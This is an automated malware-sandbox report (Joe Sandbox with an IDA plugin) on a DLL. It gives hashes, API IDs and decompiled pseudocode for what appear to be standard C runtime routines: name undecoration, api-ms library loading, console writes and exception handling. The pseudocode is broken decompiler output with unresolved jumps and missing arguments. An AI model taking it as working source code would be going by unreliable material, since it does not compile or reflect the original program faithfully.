                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: b22cffdbc5156b7699b9e6ed061bc683ae1de6a7e518bc903a77d5191b6cb189
                                                                      • Instruction ID: a0f7a7e146d0472019a5f4cedeea5f0297e5a247b09fa3e1c7336c428ccf4d18
                                                                      • Opcode Fuzzy Hash: b22cffdbc5156b7699b9e6ed061bc683ae1de6a7e518bc903a77d5191b6cb189
                                                                      • Instruction Fuzzy Hash: A5318331712B48A1EEA3DB16A8007E53394B74CBE4F598536BD1D5BBA0EF39C6899700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 63%
                                                                      			E000000011800075F0(long long __rbx, long long* __rcx, long long __rdx, void* __rsi, void* __r8, long long _a8) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				void* _v56;
                                                                      				void* __rbp;
                                                                      				unsigned int _t28;
                                                                      				unsigned int _t33;
                                                                      				intOrPtr _t37;
                                                                      				char* _t48;
                                                                      				char* _t49;
                                                                      				intOrPtr* _t52;
                                                                      				long long _t54;
                                                                      				long long* _t62;
                                                                      				long long _t68;
                                                                      				void* _t74;
                                                                      
                                                                      				_t68 = __rdx;
                                                                      				_a8 = __rbx;
                                                                      				_t48 =  *0x80071308; // 0x0
                                                                      				_t62 = __rcx;
                                                                      				if ( *_t48 == 0x58) goto 0x80007710;
                                                                      				if ( *_t48 == 0x5a) goto 0x800076d3;
                                                                      				E0000000118000745C(__rcx,  &_v56, __rsi, _t74, __r8);
                                                                      				_t37 = _v48;
                                                                      				if (_t37 != 0) goto 0x800076c7;
                                                                      				_t49 =  *0x80071308; // 0x0
                                                                      				if ( *_t49 == 0) goto 0x800076c7;
                                                                      				if ( *_t49 == 0x40) goto 0x800076bd;
                                                                      				if ( *_t49 == 0x5a) goto 0x80007657;
                                                                      				 *((intOrPtr*)(_t62 + 8)) = 0;
                                                                      				 *((char*)(_t62 + 8)) = 2;
                                                                      				 *_t62 = _t68;
                                                                      				goto 0x8000773e;
                                                                      				 *0x80071308 = _t49 + 1;
                                                                      				_t28 =  *0x80071318; // 0x0
                                                                      				if (( !(_t28 >> 0x12) & 0x00000001) == 0) goto 0x80007684;
                                                                      				_v32 = 4;
                                                                      				goto 0x80007692;
                                                                      				_t52 = ",<ellipsis>";
                                                                      				_v32 = 0xb;
                                                                      				_v40 = _t52;
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E00000001180005F1C( &_v56,  &_v24,  &_v40);
                                                                      				 *_t62 =  *_t52;
                                                                      				 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t52 + 8));
                                                                      				goto 0x8000773e;
                                                                      				 *0x80071308 = _t52 + 1;
                                                                      				_t54 = _v56;
                                                                      				 *_t62 = _t54;
                                                                      				 *((intOrPtr*)(_t62 + 8)) = _t37;
                                                                      				goto 0x8000773e;
                                                                      				 *0x80071308 = _t54 + 1;
                                                                      				_t33 =  *0x80071318; // 0x0
                                                                      				if (( !(_t33 >> 0x12) & 0x00000001) == 0) goto 0x80007700;
                                                                      				_v32 = 3;
                                                                      				goto 0x8000772c;
                                                                      				_v32 = 0xa;
                                                                      				goto 0x8000772c;
                                                                      				_v32 = 4;
                                                                      				 *0x80071308 = "<ellipsis>" + 1;
                                                                      				_v40 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				return E000000011800059CC("void",  *_t52,  &_v40);
                                                                      			}



















                                                                      0x1800075f0
                                                                      0x1800075f0
                                                                      0x1800075fd
                                                                      0x180007604
                                                                      0x18000760a
                                                                      0x180007613
                                                                      0x18000761d
                                                                      0x180007622
                                                                      0x180007629
                                                                      0x18000762f
                                                                      0x180007638
                                                                      0x180007641
                                                                      0x180007646
                                                                      0x180007648
                                                                      0x18000764b
                                                                      0x18000764f
                                                                      0x180007652
                                                                      0x18000765e
                                                                      0x180007665
                                                                      0x180007672
                                                                      0x18000767b
                                                                      0x180007682
                                                                      0x180007684
                                                                      0x18000768b
                                                                      0x180007692
                                                                      0x18000769a
                                                                      0x1800076a2
                                                                      0x1800076a7
                                                                      0x1800076af
                                                                      0x1800076b5
                                                                      0x1800076b8
                                                                      0x1800076c0
                                                                      0x1800076c7
                                                                      0x1800076cb
                                                                      0x1800076ce
                                                                      0x1800076d1
                                                                      0x1800076da
                                                                      0x1800076e1
                                                                      0x1800076ee
                                                                      0x1800076f7
                                                                      0x1800076fe
                                                                      0x180007707
                                                                      0x18000770e
                                                                      0x180007713
                                                                      0x18000771a
                                                                      0x18000772c
                                                                      0x180007730
                                                                      0x180007734
                                                                      0x18000774b

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                      • API String ID: 1405650943-2211150622
                                                                      • Opcode ID: 526beb1de9b9a89500194560d209e67ede989f34fd14310184bc8e08c1948548
                                                                      • Instruction ID: 3940e1c7961a8756ce07a1ce5fc210870e384cea1037f1338f32cd2f2e97112f
                                                                      • Opcode Fuzzy Hash: 526beb1de9b9a89500194560d209e67ede989f34fd14310184bc8e08c1948548
                                                                      • Instruction Fuzzy Hash: FB411772A04B488DF792CF28D8813EC37A0A31CB88F54C115EA8D567A6DF3D8788C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E00000001180009494(void* __edi, long long __rbx, long long __rcx, void* __rdi, void* __rsi, long long _a8) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				void* _v40;
                                                                      				intOrPtr _v48;
                                                                      				long long _v56;
                                                                      				intOrPtr _t30;
                                                                      				intOrPtr _t32;
                                                                      				char _t42;
                                                                      				char* _t47;
                                                                      				intOrPtr* _t48;
                                                                      				long long* _t55;
                                                                      				char* _t58;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t47 =  *0x80071308; // 0x0
                                                                      				_t55 = __rcx;
                                                                      				_v56 = __rcx;
                                                                      				_v48 = 0;
                                                                      				_t42 =  *_t47;
                                                                      				if (_t42 == 0) goto 0x800095a9;
                                                                      				if (_t42 == 0) goto 0x8000951d;
                                                                      				if (_t42 == 0) goto 0x8000951d;
                                                                      				if (_t42 == 0) goto 0x8000950e;
                                                                      				if (_t42 == 0) goto 0x8000950e;
                                                                      				if (_t42 == 0) goto 0x80009533;
                                                                      				if (_t42 == 0) goto 0x800094ff;
                                                                      				if (_t42 == 0) goto 0x800094f6;
                                                                      				if ( *_t47 - 0x2a == 1) goto 0x800094f6;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                      				 *((char*)(__rcx + 8)) = 2;
                                                                      				 *((long long*)(__rcx)) = __rcx;
                                                                      				goto 0x800095b6;
                                                                      				goto 0x80009524;
                                                                      				r8d = 4;
                                                                      				goto 0x8000952a;
                                                                      				r8d = 6;
                                                                      				goto 0x8000952a;
                                                                      				r8d = 5;
                                                                      				_t58 =  &_v56;
                                                                      				E00000001180005714(_t47, __rcx, _t58, "char ", __rdi, __rsi);
                                                                      				_t48 =  *0x80071308; // 0x0
                                                                      				_t32 =  *_t48;
                                                                      				 *0x80071308 =  *0x80071308 + 1;
                                                                      				if ((_t58 - 0x00000031 & 0x000000f9) != 0) goto 0x8000954f;
                                                                      				if (_t32 != 0x37) goto 0x80009554;
                                                                      				if (_t32 != 0x37) goto 0x8000959a;
                                                                      				_v32 = 9;
                                                                      				_t49 = "unsigned ";
                                                                      				_v40 = "unsigned ";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E000000011800059CC("unsigned ",  &_v24,  &_v40);
                                                                      				E00000001180005F48(_t49,  &_v40,  &_v56);
                                                                      				_v56 = _v40;
                                                                      				_v48 = _v32;
                                                                      				 *_t55 = _v56;
                                                                      				_t30 = _v48;
                                                                      				 *((intOrPtr*)(_t55 + 8)) = _t30;
                                                                      				goto 0x800095b6;
                                                                      				 *((intOrPtr*)(_t55 + 8)) = _t32;
                                                                      				 *_t55 = 0x8005f780;
                                                                      				return _t30;
                                                                      			}















                                                                      0x180009494
                                                                      0x1800094a1
                                                                      0x1800094a8
                                                                      0x1800094ad
                                                                      0x1800094b1
                                                                      0x1800094b4
                                                                      0x1800094b6
                                                                      0x1800094c2
                                                                      0x1800094c7
                                                                      0x1800094cc
                                                                      0x1800094d1
                                                                      0x1800094d6
                                                                      0x1800094db
                                                                      0x1800094e0
                                                                      0x1800094e5
                                                                      0x1800094e7
                                                                      0x1800094ea
                                                                      0x1800094ee
                                                                      0x1800094f1
                                                                      0x1800094fd
                                                                      0x1800094ff
                                                                      0x18000950c
                                                                      0x18000950e
                                                                      0x18000951b
                                                                      0x180009524
                                                                      0x18000952a
                                                                      0x18000952e
                                                                      0x180009533
                                                                      0x18000953a
                                                                      0x18000953c
                                                                      0x180009548
                                                                      0x18000954d
                                                                      0x180009552
                                                                      0x180009554
                                                                      0x18000955b
                                                                      0x180009562
                                                                      0x18000956a
                                                                      0x180009572
                                                                      0x180009577
                                                                      0x180009587
                                                                      0x180009590
                                                                      0x180009597
                                                                      0x18000959e
                                                                      0x1800095a1
                                                                      0x1800095a4
                                                                      0x1800095a7
                                                                      0x1800095b0
                                                                      0x1800095b3
                                                                      0x1800095c3

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: char $int $long $short $unsigned
                                                                      • API String ID: 2943138195-3894466517
                                                                      • Opcode ID: 6a4821efb2c9af6ea9600bc8990059f8bc6018e250c812de8fdce70b6f823f03
                                                                      • Instruction ID: aaf29c4696f27858034d4480bd3930af9bff89b9934b91e94dbcc25456c4fbb3
                                                                      • Opcode Fuzzy Hash: 6a4821efb2c9af6ea9600bc8990059f8bc6018e250c812de8fdce70b6f823f03
                                                                      • Instruction Fuzzy Hash: 2B415672A15A5889FB93CFA9E8543ED37B1A30DB89F44C111EA4816B99DF39C74CC700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 46%
                                                                      			E0000000118000F784(long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				signed long long _t38;
                                                                      				intOrPtr _t42;
                                                                      				signed long long _t43;
                                                                      				signed long long _t61;
                                                                      				long _t65;
                                                                      				void* _t68;
                                                                      				WCHAR* _t71;
                                                                      
                                                                      				_t38 = _t61;
                                                                      				 *((long long*)(_t38 + 8)) = __rbx;
                                                                      				 *((long long*)(_t38 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t38 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t38 + 0x20)) = __rdi;
                                                                      				if (__rdx == __r8) goto 0x8000f848;
                                                                      				_t42 =  *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8));
                                                                      				if (_t42 == 0) goto 0x8000f7d6;
                                                                      				if (_t42 != 0xffffffff) goto 0x8000f882;
                                                                      				goto 0x8000f83b;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(_t71, _t68, _t65);
                                                                      				_t43 = _t38;
                                                                      				if (_t38 != 0) goto 0x8000f869;
                                                                      				if (GetLastError() != 0x57) goto 0x8000f82f;
                                                                      				_t12 = _t43 + 7; // 0x7
                                                                      				r8d = _t12;
                                                                      				if (E0000000118003C5E8(__r8) == 0) goto 0x8000f82f;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t38 != 0) goto 0x8000f869;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71410 + __rsi * 8)) = _t38 | 0xffffffff;
                                                                      				if (__rdx + 4 != __r8) goto 0x8000f7ba;
                                                                      				return 0;
                                                                      			}










                                                                      0x18000f784
                                                                      0x18000f787
                                                                      0x18000f78b
                                                                      0x18000f78f
                                                                      0x18000f793
                                                                      0x18000f7ad
                                                                      0x18000f7bc
                                                                      0x18000f7c8
                                                                      0x18000f7ce
                                                                      0x18000f7d4
                                                                      0x18000f7e3
                                                                      0x18000f7e9
                                                                      0x18000f7ef
                                                                      0x18000f7f5
                                                                      0x18000f800
                                                                      0x18000f802
                                                                      0x18000f802
                                                                      0x18000f817
                                                                      0x18000f819
                                                                      0x18000f821
                                                                      0x18000f82d
                                                                      0x18000f833
                                                                      0x18000f842
                                                                      0x18000f868

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: fd381fcb067ca501b2a868a677a5f66ed13a374cce937b28e6e47a9447253395
                                                                      • Instruction ID: 1db33349f22487c3b6be11fd8d545140cb089d0f355431f28ac3b352e970fc98
                                                                      • Opcode Fuzzy Hash: fd381fcb067ca501b2a868a677a5f66ed13a374cce937b28e6e47a9447253395
                                                                      • Instruction Fuzzy Hash: 6A217431701A0891EAA6DB1698043E973A4BB4CBF0F58C635FE2957BD0DF38D649D304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3813093105-537541572
                                                                      • Opcode ID: 0455f011cf15a5e51da70892be0e0c6ebb1809833f425680f1eaf303684194c8
                                                                      • Instruction ID: ddca8f0cf56a5ebca5640a13208f8e6a83883affbebce22e42bd408b9b5217b5
                                                                      • Opcode Fuzzy Hash: 0455f011cf15a5e51da70892be0e0c6ebb1809833f425680f1eaf303684194c8
                                                                      • Instruction Fuzzy Hash: 4121A531B01E0850EEA6CB16A8803E522A5FB4CBF4F19C221FD69467E0EE39C6498345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E00000001180046EF8(void* __ecx, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                      				void* _t32;
                                                                      				void* _t47;
                                                                      				intOrPtr _t48;
                                                                      				signed long long _t49;
                                                                      				signed long long _t53;
                                                                      				void* _t75;
                                                                      				void* _t78;
                                                                      				struct HINSTANCE__* _t79;
                                                                      
                                                                      				_t47 = _t75;
                                                                      				 *((long long*)(_t47 + 8)) = __rbx;
                                                                      				 *((long long*)(_t47 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t47 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t47 + 0x20)) = __rdi;
                                                                      				_t48 =  *((intOrPtr*)(0x180000000 + 0x71ef0 + __rdi * 8));
                                                                      				if (_t48 == 0) goto 0x80046f39;
                                                                      				_t49 =  ==  ? __rbp : _t48;
                                                                      				goto 0x80046fd6;
                                                                      				r8d = 0x800;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				if (_t49 != 0) goto 0x80046faa;
                                                                      				if (GetLastError() != 0x57) goto 0x80046fc8;
                                                                      				_t12 = _t49 - 0x50; // -80
                                                                      				_t32 = _t12;
                                                                      				r8d = _t32;
                                                                      				if (E0000000118003C5E8(_t78) == 0) goto 0x80046fc8;
                                                                      				r8d = _t32;
                                                                      				if (E0000000118003C5E8(_t78) == 0) goto 0x80046fc8;
                                                                      				r8d = 0;
                                                                      				LoadLibraryExW(??, ??, ??);
                                                                      				_t53 = _t49;
                                                                      				if (_t49 == 0) goto 0x80046fc8;
                                                                      				_t13 = 0x180000000 + 0x71ef0 + __rdi * 8;
                                                                      				 *_t13 = _t53;
                                                                      				if ( *_t13 == 0) goto 0x80046fc3;
                                                                      				FreeLibrary(_t79);
                                                                      				goto 0x80046fd6;
                                                                      				 *((intOrPtr*)(0x180000000 + 0x71ef0 + __rdi * 8)) = _t53 | 0xffffffff;
                                                                      				return 0;
                                                                      			}











                                                                      0x180046ef8
                                                                      0x180046efb
                                                                      0x180046eff
                                                                      0x180046f03
                                                                      0x180046f07
                                                                      0x180046f1a
                                                                      0x180046f27
                                                                      0x180046f30
                                                                      0x180046f34
                                                                      0x180046f46
                                                                      0x180046f4c
                                                                      0x180046f58
                                                                      0x180046f63
                                                                      0x180046f65
                                                                      0x180046f65
                                                                      0x180046f6b
                                                                      0x180046f7c
                                                                      0x180046f7e
                                                                      0x180046f92
                                                                      0x180046f94
                                                                      0x180046f9c
                                                                      0x180046fa2
                                                                      0x180046fa8
                                                                      0x180046fad
                                                                      0x180046fad
                                                                      0x180046fb8
                                                                      0x180046fbd
                                                                      0x180046fc6
                                                                      0x180046fcc
                                                                      0x180046ff0

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3813093105-537541572
                                                                      • Opcode ID: 8e15efe103d8296b82805be40b0246a6c3adf41aac86677863ffddf345a2a075
                                                                      • Instruction ID: 26a99d0d03aca699e0534a0c9db9b2c9d6b87e10489885b8d46de4b8d2eaf0e0
                                                                      • Opcode Fuzzy Hash: 8e15efe103d8296b82805be40b0246a6c3adf41aac86677863ffddf345a2a075
                                                                      • Instruction Fuzzy Hash: 3321F332711F1880FAA2CB16A4407D82790BB4CBF4F598226FE6943BE0EF38D20D8305
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: f979c3ec5602c8924af38e8e1b98035285f747c8c277c31ef552c09f97942387
                                                                      • Instruction ID: e93966b15778256aea926fc40fcab3a896feee927149e159ff148a0df1a0fe12
                                                                      • Opcode Fuzzy Hash: f979c3ec5602c8924af38e8e1b98035285f747c8c277c31ef552c09f97942387
                                                                      • Instruction Fuzzy Hash: A3117F3030464C45FAEBA33595857FB63426B8C7F4F16C725B876867C7DE2986498301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: aaa4fd5732d47a3a5dd2292c07bf072f6e470f87abf219dedcd4ad2924f52ab0
                                                                      • Instruction ID: 16742c5bd08f32db367f035d9158e13c893aadc3ba57b25c514bf7a57e440868
                                                                      • Opcode Fuzzy Hash: aaa4fd5732d47a3a5dd2292c07bf072f6e470f87abf219dedcd4ad2924f52ab0
                                                                      • Instruction Fuzzy Hash: 9A119D31310B4986E7A18B52F84479963A0F78CBE4F148225FE5A87B94CF7ACA488740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: c6d6c657dfb3df1bd736ab0de7950f84b2699b3fecf86432ff890fb380133a2d
                                                                      • Instruction ID: 985b9e65d95e71aacc7c1988dad8be7649cb3297a25c33465245d6cd78ee87a5
                                                                      • Opcode Fuzzy Hash: c6d6c657dfb3df1bd736ab0de7950f84b2699b3fecf86432ff890fb380133a2d
                                                                      • Instruction Fuzzy Hash: F5114C32210A4982EBA28B55E8147997370F38CBE8F108216FE5A47B94CF3EC649C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001088C(void* __ecx, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t157;
                                                                      				intOrPtr _t158;
                                                                      				intOrPtr _t160;
                                                                      				void* _t179;
                                                                      				intOrPtr _t195;
                                                                      				intOrPtr _t200;
                                                                      				void* _t201;
                                                                      				signed long long _t239;
                                                                      				signed long long _t240;
                                                                      				signed char _t241;
                                                                      				intOrPtr* _t243;
                                                                      				long long _t245;
                                                                      				long long _t253;
                                                                      				intOrPtr* _t255;
                                                                      				signed char* _t257;
                                                                      				intOrPtr* _t269;
                                                                      				void* _t290;
                                                                      				void* _t291;
                                                                      				void* _t292;
                                                                      				void* _t293;
                                                                      				signed long long _t294;
                                                                      				long long _t303;
                                                                      				long long _t304;
                                                                      				intOrPtr* _t305;
                                                                      				long long _t313;
                                                                      				signed char* _t316;
                                                                      				intOrPtr _t321;
                                                                      
                                                                      				_t292 = _t293 - 0x88;
                                                                      				_t294 = _t293 - 0x188;
                                                                      				_t239 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t240 = _t239 ^ _t294;
                                                                      				 *(_t292 + 0x70) = _t240;
                                                                      				_t316 =  *((intOrPtr*)(_t292 + 0xf0));
                                                                      				 *((long long*)(_t294 + 0x78)) = __rdx;
                                                                      				_t257 = _t316;
                                                                      				 *((long long*)(_t292 - 0x60)) =  *((intOrPtr*)(_t292 + 0x108));
                                                                      				_t291 = __r9;
                                                                      				 *((char*)(_t294 + 0x60)) = 0;
                                                                      				E0000000118000FB20(_t257, __r9, __r9);
                                                                      				if ( *((intOrPtr*)(__r9 + 0x48)) == 0) goto 0x80010908;
                                                                      				E0000000118000E0F4(_t240);
                                                                      				if ( *((intOrPtr*)(_t240 + 0x78)) != 0xfffffffe) goto 0x80010d81;
                                                                      				goto 0x80010927;
                                                                      				E0000000118000E0F4(_t240);
                                                                      				if ( *((intOrPtr*)(_t240 + 0x78)) == 0xfffffffe) goto 0x80010927;
                                                                      				E0000000118000E0F4(_t240);
                                                                      				_t200 =  *((intOrPtr*)(_t240 + 0x78));
                                                                      				E0000000118000E0F4(_t240);
                                                                      				 *((intOrPtr*)(_t240 + 0x78)) = 0xfffffffe;
                                                                      				if (_t200 - 0xffffffff < 0) goto 0x80010d81;
                                                                      				if (_t316[8] == 0) goto 0x80010967;
                                                                      				_t241 = _t257[0x18005f7b0];
                                                                      				goto 0x80010969;
                                                                      				if (_t200 >= 0) goto 0x80010d81;
                                                                      				if ( *__rcx != 0xe06d7363) goto 0x80010a41;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 4) goto 0x80010a41;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x20)) - 0x19930520 - 2 > 0) goto 0x80010a41;
                                                                      				if ( *((long long*)(__rcx + 0x30)) != 0) goto 0x80010a41;
